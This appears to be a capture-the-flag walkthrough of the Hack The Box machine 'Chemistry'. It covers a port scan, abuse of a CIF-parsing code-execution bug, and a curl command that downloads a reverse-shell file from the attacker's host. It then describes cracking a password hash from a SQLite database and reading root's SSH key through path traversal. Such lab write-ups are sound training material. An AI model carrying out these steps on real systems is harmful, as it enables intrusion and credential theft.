search

Chemistry (HTB)

Can you save the world ????

Hello Eveyone WE back again with HTB machine i really enjoy HTB machines recently.

hashtag
Enumeration.

hashtag
Port scan.

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCj5eCYeJYXEGT5pQjRRX4cRr4gHoLUb/riyLfCAQMf40a6IO3BMzwyr3OnfkqZDlr6o9tS69YKDE9ZkWk01vsDM/T1k/m1ooeOaTRhx2Yene9paJnck8Stw4yVWtcq6PPYJA3HxkKeKyAnIVuYBvaPNsm+K5+rsafUEc5FtyEGlEG0YRmyk/NepEFU6qz25S3oqLLgh9Ngz4oGeLudpXOhD4gN6aHnXXUHOXJgXdtY9EgNBfd8paWTnjtloAYi4+ccdMfxO7PcDOxt5SQan1siIkFq/uONyV+nldyS3lLOVUCHD7bXuPemHVWqD2/1pJWf+PRAasCXgcUV+Je4fyNnJwec1yRCbY3qtlBbNjHDJ4p5XmnIkoUm7hWXAquebykLUwj7vaJ/V6L19J4NN8HcBsgcrRlPvRjXz0A2VagJYZV+FVhgdURiIM4ZA7DMzv9RgJCU2tNC4EyvCTAe0rAM2wj0vwYPPEiHL+xXHGSvsoZrjYt1tGHDQvy8fto5RQU=
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
|   256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open  upnp?   syn-ack ttl 63
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Mon, 28 Oct 2024 12:54:13 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

So we have an web page on 5000 which appears to run python 3.9.5 and SSH. Let's see what we have in the web.

So we have a login/Register page let's make account and see what it is all about.

So we can upload something called CIF what is CIF files ???.

circle-info

CIF files, or Crystallographic Information Files, are standardized text-based files used to store and share crystallographic data, particularly in fields like chemistry, materials science, and structural biology. These files describe the structure and properties of crystalline materials, including atomic positions, symmetry, and unit cell parameters.

Okkkkk.

From there it just a matter of googling and you find the answer. 👻

OK. So the server running python and the exploit is in a python libary so am assuing this is what we looking for.

LogoArbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_stringGitHubchevron-right

Navigating to this git repo we can see a POC to test.

So i make it fetch my server to see if it exploiable or not.

And indded.

hashtag
Getting Shell.

So i decide to upload file into the server. which contain reverse shell.

The file name was bash.sh as in the exploit file but it keep adding this * so i added it into the file name.

circle-info

The command i used to upload into the server was

curl http://<IP>:<PORT>/<FILENAME> -o <FILENAME>

And then i added executable permissions and then i ran the file each operation was in its own request. and i got a shell.

hashtag
Getting Shell as Rosa (Password Reuse On The Top) .

So to access Rosa's shell. First i look in her home directory since we have read permission. But there was nothing there just an intresting script but was not good. i tried to forward port 8080 but there was nothing. It turns out to be simpler than i think i view the app.py and i find that it uses sqlite db we can find it here.

I upload this into my machine.

So i take that password and i tried to crack it.

Using.

LogoCrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.netchevron-right

After that i created ssh key to make things easier.

And copy the private key into your machine.

hashtag
Shell as Root.

From here things are simple we see that rosa give us a hint in her exploit.sh and 1.sh we can see that she tries to prefom path traversal afte the endpoint /assets. So i use port forward from SSH.

And i used burpsuit. to check it.

From rosa exploit we can see that the root has id_rsa. so i tried to access it.

And we can login as root using this key. and copy the SSH key and change its premissions. and login using it.

hashtag
Summary.

The machine was too fun and easy i love it.

PreviousInstant (HTB)NextCicada (HTB)

Last updated